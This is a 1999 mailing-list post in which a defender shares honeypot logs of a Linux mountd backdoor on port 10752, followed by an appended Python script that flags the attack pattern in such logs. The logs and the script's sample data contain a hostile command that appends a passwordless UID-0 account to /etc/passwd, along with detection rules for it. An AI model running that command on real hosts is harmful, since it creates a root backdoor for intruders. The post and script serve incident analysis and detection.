Firewall Wizards mailing list archives

RE: Port 10752?


From: "Frank W. Keeney" <FKeeney () hsa com>
Date: Wed, 24 Mar 1999 08:27:10 -0800

Thank you. I run the Deception Toolkit on one of my hosts to make it
appear vulnerable to mountd exploits. I started seeing attempts at 10752
so I created a port 10752 deception. A few days ago I logged this:

Hostname and IP addresses removed for obvious reasons:

Commands to port 10752:

S0  Init
S0  trap '' SIGALRM SIGTRAP
S0  PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0  /usr/sbin/rpc.mountd </dev/null
S0  /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
/etc/passwd

Attempts to telnet using moof username:

S0
S0  moof
S0  mooof
S0  moof
S0  moof
S0  moof
S0  moof
S0  moof
S0  moof

Another try:

S0  Init
S0  trap '' SIGALRM SIGTRAP
S0  PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0  /usr/sbin/rpc.mountd </dev/null
S0  /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
/etc/passwd
S0  ChildSignal ALRM

More attempts to telnet using moof username:

S0
S0  moof



        ----------
        From:  Vern Paxson [SMTP:vern () ee lbl gov]
        Sent:  Tuesday, March 23, 1999 8:28 PM
        To:  Frank W. Keeney
        Cc:  firewall-wizards () nfr net
        Subject:  Re: Port 10752?

        > What is Port 10752?
        > 
        > I've been scanned several times from different locations for
        > this port number.

        It's a backdoor.  In particular, that's the port that one of the
        Linux mountd overflow exploits runs its backdoor on if it succeeds.
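Added example (not part of the original thread, and not DTK's own code): a small triage script that reads DTK-style "S<state>  <text>" command-log lines like the ones quoted above and flags the post-exploitation pattern the backdoor shell produces: the trap that makes the shell ignore SIGALRM/SIGTRAP, the uname/id reconnaissance, and the echo of a UID-0 account into /etc/passwd. It then correlates the later login attempts against the injected username. The sample lines are constructed from the excerpt in the mail; the redirection operator in front of /etc/passwd is missing from the archived message, so its reconstruction as ">>" is an assumption, as is the exact DTK line format.

```python
"""Triage DTK-style command logs for the mountd-backdoor post-exploitation
pattern: signal trap, recon, UID-0 account appended to /etc/passwd, and
later login attempts against the injected account."""
import re
from dataclasses import dataclass

# Constructed sample, modelled on the DTK excerpt quoted in the message above.
# ASSUMPTION: the archived mail lost the redirection before /etc/passwd
# (probably eaten by HTML rendering); '>>' is supplied here so the line parses.
COMMAND_LOG = """\
S0  Init
S0  trap '' SIGALRM SIGTRAP
S0  PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0  /usr/sbin/rpc.mountd </dev/null
S0  /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash' >>/etc/passwd
S0  ChildSignal ALRM
"""

# Constructed sample of the follow-up telnet login attempts DTK logged.
LOGIN_LOG = """\
S0
S0  moof
S0  mooof
S0  moof
"""

# passwd(5) record: name:password:uid:gid:gecos:home:shell (may sit inside quotes)
PASSWD_RECORD = re.compile(
    r"([A-Za-z_][A-Za-z0-9_.-]*):([^:'\"\s]*):(\d+):(\d+):([^:'\"]*):([^:'\"]*):([^:'\"\s]*)"
)
PASSWD_WRITE = re.compile(r">>?\s*/etc/passwd\b")   # > or >> into the passwd file
DTK_LINE = re.compile(r"^(S\d+)\s*(.*)$")            # ASSUMED DTK format: S<state>  <text>
RECON_CMD = re.compile(r"(^|/)(uname|id)\b")


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    detail: str
    account: str = ""   # username involved, for account-injection findings


def dtk_commands(log: str):
    """Yield (line_no, state, text) for each 'S<n>  <text>' line in the log."""
    for n, raw in enumerate(log.splitlines(), start=1):
        m = DTK_LINE.match(raw)
        if m:
            yield n, m.group(1), m.group(2).strip()


def split_simple_commands(text: str) -> list[str]:
    """Split a shell line on ; && || and | (sufficient for this log style)."""
    return [c.strip() for c in re.split(r";|&&|\|\||\|", text) if c.strip()]


def triage(log: str) -> list[Finding]:
    """Return findings for each suspicious simple command in the log."""
    findings: list[Finding] = []
    for line_no, _state, text in dtk_commands(log):
        for cmd in split_simple_commands(text):
            if cmd.startswith("trap ''") or cmd.startswith('trap ""'):
                # Ignoring ALRM/TRAP keeps the backdoor shell alive and undebuggable.
                findings.append(Finding(line_no, "signal_trap", "shell ignores signals: " + cmd))
            elif RECON_CMD.search(cmd):
                findings.append(Finding(line_no, "recon", cmd))
            rec = PASSWD_RECORD.search(cmd)
            if rec and PASSWD_WRITE.search(cmd):
                name, pw, uid = rec.group(1), rec.group(2), int(rec.group(3))
                if uid == 0:   # any new UID-0 record is a root backdoor account
                    detail = f"UID-0 account '{name}' appended to /etc/passwd"
                    if pw == "":
                        detail += " with empty password field"
                    findings.append(Finding(line_no, "uid0_account_injection", detail, name))
    return findings


def injected_accounts(findings: list[Finding]) -> set[str]:
    """Usernames that were written into /etc/passwd with UID 0."""
    return {f.account for f in findings if f.rule == "uid0_account_injection"}


def correlate_logins(login_log: str, accounts: set[str]) -> dict[str, int]:
    """Count login-name attempts (one name per DTK line) matching injected accounts."""
    counts = {a: 0 for a in accounts}
    for _n, _state, text in dtk_commands(login_log):
        if text in counts:
            counts[text] += 1
    return counts


if __name__ == "__main__":
    found = triage(COMMAND_LOG)
    for f in found:
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
    names = injected_accounts(found)
    print("login attempts against injected accounts:", correlate_logins(LOGIN_LOG, names))
```

On the sample above the script reports the trap on line 2, the two recon commands and the injected 'moof' account (empty password field, UID 0) on line 5, and two later login attempts for 'moof'; a record with a non-zero UID written to /etc/passwd produces no account-injection finding.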
        


